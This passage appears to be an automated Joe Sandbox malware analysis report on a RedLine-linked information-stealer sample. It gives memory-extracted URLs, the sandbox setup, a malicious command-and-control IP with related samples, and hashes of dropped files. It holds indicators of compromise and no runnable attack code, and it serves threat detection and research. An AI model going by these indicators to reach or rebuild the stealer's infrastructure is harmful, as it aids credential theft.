                    http://tempuri.org/Entity/Id12Response | kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029EF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://tempuri.org/ | kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://tempuri.org/Entity/Id2Response | kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id21ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/Entity/Id9kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id8kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/Entity/Id5kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id4kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id7kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id6kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id19ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Entity/Id15ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Entity/Id6ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.ip.sb/ipiOqzwbUlln.exe, 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, kGO12fD60.exe, 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, rWE40pD80.exe.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/sckGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id9ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id20kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id21kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id22kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id1ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedkGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegokGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingkGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id10kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id11kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id12kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id16ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id13kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id14kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id15kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NoncekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id17kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id18kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id5ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id19kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnskGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm8DkGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
IP: 193.233.20.23
Domain: unknown
Country: Russian Federation
ASN: 8749
ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Malicious: true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 815872
Start date and time: 2023-02-27 11:37:41 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: iOqzwbUlln.exe
Original Sample Name: fc3e0027ffead1129accedcb4814e96f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@15/10@0/1
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 33.7% (good quality ratio 32.3%)
• Quality average: 84.5%
• Quality standard deviation: 23.7%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 136
• Number of non-executed functions: 142
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time: 11:39:18
Type: API Interceptor
Description: 20x Sleep call for process: kGO12fD60.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      193.233.20.23file.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                        9f914a5634bd760e278fe057d840e7e78d04d65ceb13b.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                          rVS0VXJypi.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                            838X3fW5xZ.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                              blA4H3aNXq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                e5d7fcd1389993e49d4bbdcdebcbd073c14213d5d2f7a.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                  rv4kArJlRb.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                    gLLFuxUxAo.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                      W7ANVukbbj.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                        IBeoz2lT1O.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                          O3m4OQha7t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                            cKulR3hExf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                              j0PvFMsaPX.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                Qt5NzBQSp3.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                  7B4JTs3B6G.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                    9sqZDwVLWx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                        sPgGBA7Yuf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                          lkpILPqpDR.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                            i2vX2df3mr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              No context
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              REDCOM-ASRedcomKhabarovskRussiaRUfile.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              9f914a5634bd760e278fe057d840e7e78d04d65ceb13b.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              rVS0VXJypi.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              838X3fW5xZ.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              blA4H3aNXq.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              e5d7fcd1389993e49d4bbdcdebcbd073c14213d5d2f7a.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              rv4kArJlRb.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              gLLFuxUxAo.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              W7ANVukbbj.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              IBeoz2lT1O.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              O3m4OQha7t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              cKulR3hExf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              j0PvFMsaPX.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              Qt5NzBQSp3.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              7B4JTs3B6G.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              9sqZDwVLWx.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              sPgGBA7Yuf.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                              • 193.233.20.23
lkpILPqpDR.exe, Detection: malicious, Threat Name: RedLine
                                                                                                                                                                                              • 193.233.20.23
i2vX2df3mr.exe, Detection: malicious, Threat Name: RedLine
                                                                                                                                                                                              • 193.233.20.23
                                                                                                                                                                                              No context
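Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe
• Associated Sample Name: Qt5NzBQSp3.exe, Detection: malicious, Threat Name: RedLine
• Associated Sample Name: file.exe, Detection: malicious, Threat Name: RedLine
• Associated Sample Name: file.exe, Detection: malicious, Threat Name: RedLine
• Associated Sample Name: file.exe, Detection: malicious, Threat Name: RedLine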
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):226
                                                                                                                                                                                                      Entropy (8bit):5.354940450065058
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                      MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                      SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                      SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                      SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2843
                                                                                                                                                                                                      Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:MIHK5HKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHK1Hd:Pq5qXeqm00YqhQnouOqLqdqNq2qzcGtZ
                                                                                                                                                                                                      MD5:58CF1C9EAE5701A8E66D103465A98FBD
                                                                                                                                                                                                      SHA1:D78C2D38863F954605A1CAA1196C6EE40A646509
                                                                                                                                                                                                      SHA-256:10206E90EDC039BAEDD05883379565405B5E7BA04605836A539FBBB180D3BF54
                                                                                                                                                                                                      SHA-512:A01F50BB1B8F1839A15741343B0B4A548C40E7F73457C53A95ED389859EB0F142B4FB1D96AD98E4635C3E8E9E5B50156DB10BAC5736A27D61BF8B27E22720F58
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Cultu
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\iOqzwbUlln.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):179448
                                                                                                                                                                                                      Entropy (8bit):4.949141159217189
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:cxqZWN9abUP0PAqt+eeD5F6hYfxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuw6:yqZ5AqoB6h
